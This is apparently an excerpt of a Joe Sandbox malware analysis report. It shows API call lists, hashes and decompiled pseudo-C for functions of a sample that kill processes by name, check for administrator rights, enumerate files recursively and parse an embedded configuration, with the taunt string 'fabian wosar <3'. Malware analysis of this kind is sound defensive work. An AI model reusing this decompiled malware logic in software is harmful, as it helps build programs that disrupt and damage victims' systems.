                                        0x0f9d48e1
                                        0x0f9d48e1
                                        0x0f9d48cf
                                        0x0f9d48eb
                                        0x0f9d48ec
                                        0x0f9d48ec
                                        0x0f9d48f2
                                        0x00000000
                                        0x00000000
                                        0x0f9d48f4
                                        0x0f9d48f4
                                        0x0f9d48fa
                                        0x0f9d4900
                                        0x0f9d4900
                                        0x0f9d4905
                                        0x0f9d48a4
                                        0x0f9d48b0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d48b0
                                        0x0f9d4909
                                        0x0f9d4913
                                        0x0f9d4913
                                        0x0f9d4922
                                        0x0f9d48b0
                                        0x0f9d48b5
                                        0x0f9d48bd
                                        0x0f9d48cb
                                        0x0f9d48cf
                                        0x0f9d48d4
                                        0x0f9d48e1
                                        0x0f9d48e1
                                        0x0f9d48cf
                                        0x0f9d48eb
                                        0x0f9d48ec
                                        0x0f9d48ec
                                        0x0f9d48ef

                                        APIs
                                        • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F9D48B5
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F9D48C5
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0F9D48D4
                                        • CloseHandle.KERNEL32(00000000), ref: 0F9D48E1
                                        • Process32NextW.KERNEL32(?,00000000), ref: 0F9D48FA
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D4913
                                        • CloseHandle.KERNEL32(?), ref: 0F9D491A
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcess$FreeNextOpenProcess32TerminateVirtuallstrcmpi
                                        • String ID:
                                        • API String ID: 999196985-0
                                        • Opcode ID: 29c2c596a43e13983be63ca31ab453c9e7a51d9deeea4ad92d9bd36f1549700a
                                        • Instruction ID: 0c13e90c3f37b1b6ccbedb493f378c29d98aa27ca2bf31660fff7f38523b81a4
                                        • Opcode Fuzzy Hash: 29c2c596a43e13983be63ca31ab453c9e7a51d9deeea4ad92d9bd36f1549700a
                                        • Instruction Fuzzy Hash: B3012D36205101AFE7259F65EC48BAA736CEF85762F304034FE0997083DB75E8648FA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D3AA0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43memorylibraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 63%
                                        			E0F9D3AA0() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}










                                        0x0f9d3aa9
                                        0x0f9d3ac9
                                        0x0f9d3ad0
                                        0x0f9d3ad8
                                        0x0f9d3aef
                                        0x0f9d3afe
                                        0x0f9d3b05
                                        0x0f9d3b07
                                        0x0f9d3b0a
                                        0x0f9d3b16
                                        0x0f9d3add
                                        0x0f9d3add
                                        0x0f9d3add

                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F9D3AD0
                                        • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0F9D3AE3
                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0F9D3AEF
                                        • FreeSid.ADVAPI32(?), ref: 0F9D3B0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressAllocateFreeHandleInitializeModuleProc
                                        • String ID: CheckTokenMembership$advapi32.dll
                                        • API String ID: 3309497720-1888249752
                                        • Opcode ID: 18914138cd8a4ae0d84f515ac4a858540ed74b990cd854cf46b19445d37c76dd
                                        • Instruction ID: fd64464d9024e11344a8e38af1d1083c35d9bf8365ec0ac1056304d397eabc77
                                        • Opcode Fuzzy Hash: 18914138cd8a4ae0d84f515ac4a858540ed74b990cd854cf46b19445d37c76dd
                                        • Instruction Fuzzy Hash: 56F04F30A4530DBBEF109BE4DC0AFADB778EB04716F204584F905E6182E7B866648B55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6D09 Relevance: 9.0, APIs: 6, Instructions: 48stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E0F9D6D09() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E0F9D6950(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0F9D6C90(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}








                                        0x0f9d6d10
                                        0x0f9d6d24
                                        0x0f9d6d48
                                        0x0f9d6d51
                                        0x0f9d6d82
                                        0x0f9d6d8d
                                        0x0f9d6d8f
                                        0x0f9d6d92
                                        0x0f9d6d95
                                        0x0f9d6d97
                                        0x0f9d6da0
                                        0x0f9d6da0
                                        0x0f9d6da3
                                        0x0f9d6da3
                                        0x0f9d6d99
                                        0x0f9d6d9c
                                        0x0f9d6d9e
                                        0x00000000
                                        0x00000000
                                        0x0f9d6d9e
                                        0x0f9d6d97
                                        0x0f9d6d53
                                        0x0f9d6d67
                                        0x0f9d6d6c
                                        0x0f9d6db0
                                        0x0f9d6db0
                                        0x0f9d6dc3
                                        0x0f9d6dce
                                        0x0f9d6ddc

                                        APIs
                                        • lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6D1C
                                        • lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6D36
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D6D48
                                        • lstrcatW.KERNEL32(00000000,0F9DFEFC), ref: 0F9D6D59
                                          • Part of subcall function 0F9D6C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6CC3
                                          • Part of subcall function 0F9D6C90: lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6CDB
                                          • Part of subcall function 0F9D6C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6CE5
                                        • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F9D6DBD
                                        • FindClose.KERNEL32(00003000,?,?), ref: 0F9D6DCE
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 2032009209-0
                                        • Opcode ID: 101370233d85c7fbbd36b4bdc30c3d7d908449c2eedbbae6644d54c7daa7327c
                                        • Instruction ID: c2b7066f0b0fcd1e62520437090976c7bdf39c3eadaeb314cad133264c0ec824
                                        • Opcode Fuzzy Hash: 101370233d85c7fbbd36b4bdc30c3d7d908449c2eedbbae6644d54c7daa7327c
                                        • Instruction Fuzzy Hash: 88019231A04209AADF11AF64EC48BEE7BBCEF85301F2080A6F905D5092DB359B65DF20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D3200 Relevance: 8.8, APIs: 7, Instructions: 73memorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D3200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t23 = _a4;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}












                                        0x0f9d3205
                                        0x0f9d3208
                                        0x0f9d320a
                                        0x0f9d320e
                                        0x0f9d321f
                                        0x0f9d321f
                                        0x0f9d3223
                                        0x00000000
                                        0x0f9d3225
                                        0x0f9d3226
                                        0x0f9d322a
                                        0x0f9d3230
                                        0x0f9d3235
                                        0x0f9d3239
                                        0x00000000
                                        0x00000000
                                        0x0f9d323b
                                        0x00000000
                                        0x0f9d3239
                                        0x0f9d3245
                                        0x0f9d3245
                                        0x0f9d3248
                                        0x0f9d3248
                                        0x0f9d324e
                                        0x0f9d3270
                                        0x0f9d3273
                                        0x0f9d3284
                                        0x0f9d328a
                                        0x00000000
                                        0x0f9d328a
                                        0x0f9d3250
                                        0x0f9d3251
                                        0x0f9d3262
                                        0x0f9d3268
                                        0x0f9d328d
                                        0x0f9d328f
                                        0x0f9d3293
                                        0x0f9d3293
                                        0x0f9d328f
                                        0x0f9d3299
                                        0x0f9d32a5
                                        0x0f9d32a5
                                        0x0f9d3210
                                        0x0f9d3210
                                        0x0f9d3214
                                        0x0f9d3217
                                        0x00000000
                                        0x0f9d3219
                                        0x0f9d3219
                                        0x0f9d321d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d321d
                                        0x00000000
                                        0x0f9d3217
                                        0x0f9d323e
                                        0x0f9d3242
                                        0x0f9d3242
                                        0x00000000

                                        APIs
                                        • lstrlenA.KERNEL32(0F9D52F0,00000000,?,0F9D52F1,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3251
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D325B
                                        • HeapAlloc.KERNEL32(00000000,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3262
                                        • lstrlenA.KERNEL32(0F9D52F0,00000000,?,0F9D52F1,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3273
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D327D
                                        • HeapAlloc.KERNEL32(00000000,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3284
                                        • lstrcpyA.KERNEL32(00000000,0F9D52F0,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3293
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocProcesslstrlen$lstrcpy
                                        • String ID:
                                        • API String ID: 511007297-0
                                        • Opcode ID: 207fc6d70b0720cc3de088976f2a1f5535eec1b52208e9fd038fb4db2c3f1e61
                                        • Instruction ID: 9257a7390a5bef036132b5f92ebc87f15ae39da7b187e8b39800f2465428626d
                                        • Opcode Fuzzy Hash: 207fc6d70b0720cc3de088976f2a1f5535eec1b52208e9fd038fb4db2c3f1e61
                                        • Instruction Fuzzy Hash: 9A11B9318091556EEB310F689848FA67B6CEF12362F74C505FAC5CB283C73994A68772
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D33E0 Relevance: 7.6, APIs: 5, Instructions: 101memorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E0F9D33E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0F9D32B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0F9D3320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0F9D3190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0F9D3200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x850f00e8
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}















                                        0x0f9d33e3
                                        0x0f9d33e5
                                        0x0f9d33e9
                                        0x0f9d33eb
                                        0x0f9d33ee
                                        0x0f9d33f1
                                        0x0f9d33f8
                                        0x0f9d34db
                                        0x0f9d34db
                                        0x0f9d3410
                                        0x0f9d3425
                                        0x0f9d342b
                                        0x0f9d342f
                                        0x00000000
                                        0x0f9d3431
                                        0x0f9d3432
                                        0x0f9d3434
                                        0x0f9d343a
                                        0x0f9d3441
                                        0x0f9d3444
                                        0x0f9d344a
                                        0x0f9d344b
                                        0x0f9d34ba
                                        0x0f9d344d
                                        0x0f9d344e
                                        0x0f9d3450
                                        0x0f9d3452
                                        0x0f9d3456
                                        0x0f9d3467
                                        0x0f9d3467
                                        0x0f9d346b
                                        0x0f9d346d
                                        0x0f9d3471
                                        0x0f9d3473
                                        0x0f9d3478
                                        0x0f9d347c
                                        0x00000000
                                        0x00000000
                                        0x0f9d347e
                                        0x00000000
                                        0x0f9d347c
                                        0x0f9d3480
                                        0x0f9d3480
                                        0x0f9d3483
                                        0x0f9d3484
                                        0x0f9d3495
                                        0x0f9d349e
                                        0x0f9d34a3
                                        0x0f9d34a7
                                        0x0f9d34a7
                                        0x0f9d34ad
                                        0x0f9d34b0
                                        0x0f9d34b0
                                        0x00000000
                                        0x0f9d3458
                                        0x0f9d345c
                                        0x0f9d345f
                                        0x00000000
                                        0x0f9d3461
                                        0x0f9d3461
                                        0x0f9d3465
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d3465
                                        0x00000000
                                        0x0f9d345f
                                        0x0f9d3458
                                        0x0f9d3456
                                        0x0f9d344e
                                        0x0f9d344b
                                        0x0f9d3444
                                        0x0f9d34bf
                                        0x0f9d34bf
                                        0x0f9d34bf
                                        0x0f9d34c2
                                        0x0f9d34c3
                                        0x0f9d34d6
                                        0x0f9d34d6
                                        0x0f9d3412
                                        0x0f9d3412
                                        0x0f9d3418
                                        0x0f9d3422
                                        0x0f9d3422

                                        APIs
                                          • Part of subcall function 0F9D32B0: lstrlenA.KERNEL32(?,00000000,?,0F9D52F0,?,?,0F9D33F6,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D32C5
                                          • Part of subcall function 0F9D32B0: lstrlenA.KERNEL32(?,?,0F9D33F6,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D32EE
                                        • lstrlenA.KERNEL32(0F9D52F1,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3484
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0F9D52F0,00000000), ref: 0F9D348E
                                        • HeapAlloc.KERNEL32(00000000,?,0F9D52F0,00000000), ref: 0F9D3495
                                        • lstrcpyA.KERNEL32(00000000,0F9D52F1,?,0F9D52F0,00000000), ref: 0F9D34A7
                                        • ExitProcess.KERNEL32 ref: 0F9D34DB
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$HeapProcess$AllocExitlstrcpy
                                        • String ID:
                                        • API String ID: 1867342102-0
                                        • Opcode ID: f40ee0010914772b7a7c920ddefe84d5ddf38b72419f311ca54df484ae5f3618
                                        • Instruction ID: 2eadb3a7e336fa3221ecfededf03f1dda319bd8864a1b048a5c50baba3533d3b
                                        • Opcode Fuzzy Hash: f40ee0010914772b7a7c920ddefe84d5ddf38b72419f311ca54df484ae5f3618
                                        • Instruction Fuzzy Hash: F33105315082455AEB320F689844FF57B6C9F82352FB8C189F885CB2C3D62D688687A3
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D3B20 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 0F9D3B72
                                        • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F9D3B96
                                        • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F9D3B9A
                                        • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F9D3B9E
                                        • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F9D3BC5
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$InfoVerifyVersion_memset
                                        • String ID:
                                        • API String ID: 3299124433-0
                                        • Opcode ID: 71180fe03a982e302bf0205fc68ac21d9800b20cc7769f97f1eadcb03e161e13
                                        • Instruction ID: b908308a20444b2cbfb41d379da8936264d4ba24b459d59ea5ff71969377bbf9
                                        • Opcode Fuzzy Hash: 71180fe03a982e302bf0205fc68ac21d9800b20cc7769f97f1eadcb03e161e13
                                        • Instruction Fuzzy Hash: C9111BB0D4031C6EEB609F64DC0ABEA7ABCEB09704F008199A648E61C1D6B94B948FD5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D4CD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E0F9D4CD0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xf9dfa84]");
				_t16 =  *0xf9dfa8c; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}























                                        0x0f9d4cd6
                                        0x0f9d4cde
                                        0x0f9d4ce4
                                        0x0f9d4ce9
                                        0x0f9d4cec
                                        0x0f9d4cf1
                                        0x0f9d4cf6
                                        0x0f9d4cf9
                                        0x0f9d4d4a
                                        0x0f9d4d4c
                                        0x00000000
                                        0x0f9d4d4e
                                        0x0f9d4d52
                                        0x0f9d4d8f
                                        0x0f9d4d91
                                        0x00000000
                                        0x0f9d4d93
                                        0x0f9d4d9d
                                        0x0f9d4da0
                                        0x0f9d4da0
                                        0x0f9d4da4
                                        0x00000000
                                        0x00000000
                                        0x0f9d4daa
                                        0x0f9d4daa
                                        0x0f9d4dad
                                        0x0f9d4db0
                                        0x0f9d4db0
                                        0x0f9d4db4
                                        0x00000000
                                        0x00000000
                                        0x0f9d4dbe
                                        0x0f9d4dbe
                                        0x00000000
                                        0x0f9d4dba
                                        0x0f9d4dbc
                                        0x00000000
                                        0x00000000
                                        0x0f9d4dc5
                                        0x0f9d4dd4
                                        0x00000000
                                        0x0f9d4dd4
                                        0x0f9d4db0
                                        0x0f9d4d54
                                        0x0f9d4d54
                                        0x0f9d4d58
                                        0x0f9d4d5f
                                        0x0f9d4d61
                                        0x0f9d4d61
                                        0x0f9d4d66
                                        0x0f9d4d7f
                                        0x0f9d4d82
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d4d68
                                        0x0f9d4d68
                                        0x0f9d4d68
                                        0x0f9d4d6c
                                        0x00000000
                                        0x00000000
                                        0x0f9d4d75
                                        0x0f9d4d77
                                        0x00000000
                                        0x0f9d4d79
                                        0x0f9d4d79
                                        0x0f9d4d7d
